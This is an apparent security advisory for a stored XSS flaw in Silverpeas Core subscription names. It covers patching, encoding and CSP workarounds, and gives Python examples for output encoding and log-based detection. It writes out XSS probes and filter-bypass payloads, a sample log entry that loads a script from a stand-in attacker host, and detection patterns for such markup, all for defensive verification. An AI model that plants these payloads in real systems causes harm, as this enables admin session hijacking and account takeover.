CVE-2024-56923
📋 TL;DR
A stored cross-site scripting (XSS) vulnerability in Silverpeas Core lets an authenticated remote attacker inject JavaScript into the Name field of a subscription. The payload is stored server-side and executes in the browser of any admin user who later views the affected subscription, which can lead to session hijacking or actions performed with that admin's privileges. Affected versions are Silverpeas Core 6.3.1 through 6.4.1 inclusive.
💻 Affected Systems
- Silverpeas Core
📦 What is this software?
Silverpeas Core is the core module of Silverpeas, an open-source Java collaborative platform (intranet/extranet portal) published by Silverpeas. The vulnerable component is its subscription management feature.
⚠️ Risk & Real-World Impact
Worst Case
An attacker with a low-privileged account plants a payload that hijacks an admin session, then uses it for full administrative control of the Silverpeas instance: account takeover, data theft, or configuration changes.
Likely Case
Theft of an admin's session token, or actions performed silently in the admin's browser (for example creating or elevating accounts), plus exfiltration of data the admin can see.
If Mitigated
Low. Contextual output encoding (or the vendor patch) removes the sink, a strict CSP limits what an injected script can do, and restricting who may create or edit subscriptions shrinks the attacker population. Browser-side script blockers on admin workstations are not a dependable control.
🎯 Exploit Status
Exploitation requires an account that can create or modify subscriptions. The payload is stored and fires only when an admin user views the affected subscription, so the attacker must wait for (or provoke) that interaction. The reporting researcher's write-up, linked under Fix & Mitigation, describes the issue.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 6.4.2 or later
Reference: https://github.com/Mohamed-Saqib-C/CVEs/blob/main/CVE-2024-56923/README.md (the reporting researcher's write-up, not a vendor advisory; consult the Silverpeas release notes for 6.4.2 for the vendor's own description of the fix)
Restart Required: Yes
Instructions:
1. Back up the Silverpeas installation and its database.
2. Download and install Silverpeas Core 6.4.2 or later from the official repository.
3. Restart the Silverpeas service.
4. Confirm the running version is 6.4.2 or later, then re-test subscription creation with a benign XSS probe (see How to Verify) and confirm the stored name is rendered as text.
🔧 Temporary Workarounds
Input Validation and Output Encoding
Implement server-side validation of the subscription Name field (for example an allowlist of characters and a length limit) and, more importantly, HTML-entity-encode the name wherever it is rendered.
Encode <, >, &, " and ' at output time rather than stripping tags: a filter that deletes <script> is defeated by payloads that use other tags or event handlers (such as <img onerror=...>) or that reassemble after a single strip pass.
Content Security Policy
Deploy a Content Security Policy that disallows inline scripts so an injected <script> block or event handler does not execute.
Add a header such as Content-Security-Policy: script-src 'self'. This also blocks the application's own inline scripts, so test it on a staging instance first and start with Content-Security-Policy-Report-Only. Treat CSP as defense in depth, not a substitute for the patch: injected HTML still lands in the admin's page.
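The two workarounds above are easier to reason about with a concrete sink. The following Python is an added example written for this page, not Silverpeas code (Silverpeas itself is Java): the render_name_cell_* functions are a hypothetical stand-in for the admin view that prints a stored subscription name, the payloads are constructed, and the allowlist is an illustrative choice. It shows that a strip-<script> filter passes the basic probe from How to Verify yet lets two other payloads through, while entity encoding neutralises all three.

```python
import html
import re

# Constructed test payloads (made up for this example, not taken from the
# advisory). Only the first is the kind of probe the "How to Verify" step
# suggests; the other two show why tag stripping is the wrong workaround.
PAYLOADS = [
    "<script>alert('test')</script>",              # basic probe
    "<img src=x onerror=alert(1)>",                # no <script> tag at all
    "<scr<script>ipt>alert(1)</scr</script>ipt>",  # reassembles after a one-pass strip
]

# Allowlist for a subscription name: word characters, space and light
# punctuation, 1-80 chars. Deliberately strict for a stop-gap: rejects & ' " < >.
NAME_ALLOWLIST = re.compile(r"[\w .,()\-]{1,80}")


def strip_script_tags(name):
    """Anti-pattern: delete <script>/</script> tags in one pass. Bypassable."""
    return re.sub(r"(?i)</?script[^>]*>", "", name)


def validate_subscription_name(name):
    """Input-side workaround: accept the name only if every character is allowlisted."""
    return NAME_ALLOWLIST.fullmatch(name) is not None


def encode_for_html(name):
    """Output-side fix: entity-encode < > & " ' so the browser treats them as text."""
    return html.escape(name, quote=True)


def is_inert_as_html_text(rendered):
    """True when a string placed between tags cannot start a tag or a stray entity:
    no raw '<' or '>' and every '&' begins a well-formed entity.
    (Attribute context additionally needs quotes encoded, as encode_for_html does.)"""
    if "<" in rendered or ">" in rendered:
        return False
    return re.search(r"&(?!(#\d+|#x[0-9a-fA-F]+|[a-zA-Z]+);)", rendered) is None


# Illustrative sink (hypothetical, not Silverpeas's actual view code): the
# admin's subscription list writes the stored name into a table cell.
def render_name_cell_vulnerable(name):
    return f"<td>{name}</td>"


def render_name_cell_fixed(name):
    return f"<td>{encode_for_html(name)}</td>"


if __name__ == "__main__":
    for p in PAYLOADS:
        stripped = strip_script_tags(p)
        encoded = encode_for_html(p)
        print(f"payload : {p}")
        print(f"  strip : {stripped!r:58} inert={is_inert_as_html_text(stripped)}")
        print(f"  encode: {encoded!r:58} inert={is_inert_as_html_text(encoded)}")
        print(f"  allow : {validate_subscription_name(p)}")
```

The allowlist will reject legitimate names containing an ampersand or apostrophe; that is the cost of a stop-gap, and it is why output encoding, which changes nothing about what is stored, is the part to keep after patching.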
🧯 If You Can't Patch
- Restrict the right to create or modify subscriptions to trusted users, and review existing subscription names for markup: the payload is stored, so it persists until removed.
- Add WAF rules that block XSS patterns in subscription name parameters; match on decoded values and on event handlers and other tags, not only the literal string <script>, which an attacker can percent-encode or avoid entirely.
🔍 How to Verify
Check if Vulnerable:
Confirm the Silverpeas version is between 6.3.1 and 6.4.1 inclusive. Then, on a test instance (the payload is stored and fires for every admin who views it until it is deleted), create a subscription with a benign probe such as <script>alert('test')</script> in the Name field and view it as an admin. If a dialog appears, the instance is vulnerable. Because partial filters often catch only <script>, also try a variant with no script tag, for example <img src=x onerror=alert('test')>.
Check Version:
Check Silverpeas admin interface or configuration files for version information.
Verify Fix Applied:
After patching, confirm the version is 6.4.2 or later, repeat the probes above, and inspect the rendered page source: the stored name must appear entity-encoded (for example &lt;script&gt;) and no dialog may appear.
📡 Detection & Monitoring
Log Indicators:
- Subscription creation or modification by users who do not normally manage subscriptions, or a burst of such events from one account
- Requests to subscription endpoints whose name parameter contains markup (tags, event handlers such as onerror=, a javascript: scheme), including percent-encoded or entity-encoded forms
Network Indicators:
- HTTP POST requests to subscription endpoints carrying such payloads. Standard access logs do not record POST bodies, so this needs a WAF, reverse proxy or application log that captures form fields
SIEM Query (template: the source name, field names and URI path are placeholders, not Silverpeas's actual routes; adapt them to your log schema):
source="silverpeas" AND http_method="POST" AND uri_path="*subscription*" AND param_name="name" AND (param_value CONTAINS "<script" OR param_value CONTAINS "%3Cscript" OR param_value CONTAINS "onerror=" OR param_value CONTAINS "javascript:")
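As an added example (not from the original page and not Silverpeas code), here is the detection logic in Python run over constructed JSON request-log lines. The field names, user names and /silverpeas/subscription/... paths are assumptions; Silverpeas's real routes and log format may differ. The point it makes beyond the query above: a literal match on "<script>" misses percent-encoded, entity-encoded and event-handler payloads, so decode the parameter first and match a broader pattern.

```python
import html
import json
import re
from urllib.parse import unquote_plus

# Constructed request-log lines, one JSON object per line. Field names, users
# and the /silverpeas/subscription/... paths are assumptions for this example,
# not Silverpeas's real log format or routes; adapt them to your own source.
SAMPLE_LOG = """\
{"ts":"2025-01-10T09:12:01Z","user":"alice","method":"POST","uri":"/silverpeas/subscription/save","params":{"name":"Weekly digest"}}
{"ts":"2025-01-10T09:13:44Z","user":"mallory","method":"POST","uri":"/silverpeas/subscription/save","params":{"name":"<script>alert('test')</script>"}}
{"ts":"2025-01-10T09:14:02Z","user":"mallory","method":"POST","uri":"/silverpeas/subscription/save","params":{"name":"%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E"}}
{"ts":"2025-01-10T09:15:30Z","user":"mallory","method":"POST","uri":"/silverpeas/subscription/save","params":{"name":"news &lt;ScRiPt src=//attacker.example/x.js&gt;&lt;/ScRiPt&gt;"}}
{"ts":"2025-01-10T09:16:10Z","user":"bob","method":"GET","uri":"/silverpeas/subscription/list","params":{}}
"""

# Dangerous tags, event-handler attributes and the javascript: scheme.
# Case-insensitive so mixed-case tags like ScRiPt are caught.
XSS_PATTERN = re.compile(
    r"<\s*/?\s*(script|img|svg|iframe|object|embed|body|style|a)\b"
    r"|\bon[a-z]+\s*="
    r"|javascript\s*:",
    re.IGNORECASE,
)


def normalize(value, rounds=2):
    """Undo the encodings attackers layer to defeat a literal '<script>' match:
    percent-encoding (including '+' for space) and HTML entities, applied
    a couple of times to catch double encoding."""
    for _ in range(rounds):
        value = html.unescape(unquote_plus(value))
    return value


def is_subscription_write(event):
    """Only writes to the subscription component can store the payload."""
    return (event.get("method", "").upper() == "POST"
            and "/subscription" in event.get("uri", ""))


def scan_log(text):
    """Return one hit per parameter whose decoded value looks like active markup."""
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        if not is_subscription_write(event):
            continue
        for key, raw in event.get("params", {}).items():
            decoded = normalize(str(raw))
            m = XSS_PATTERN.search(decoded)
            if m:
                hits.append({
                    "ts": event["ts"], "user": event["user"], "uri": event["uri"],
                    "param": key, "match": m.group(0), "decoded": decoded,
                })
    return hits


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(f'{h["ts"]} user={h["user"]} param={h["param"]} '
              f'match={h["match"]!r} value={h["decoded"]!r}')
```

Of the five constructed lines only the three from mallory are flagged; the literal "<script>" query would have caught just the first of them. The pattern is a heuristic (a legitimate name containing "online=" would also match), so tune it against your own traffic before alerting on it.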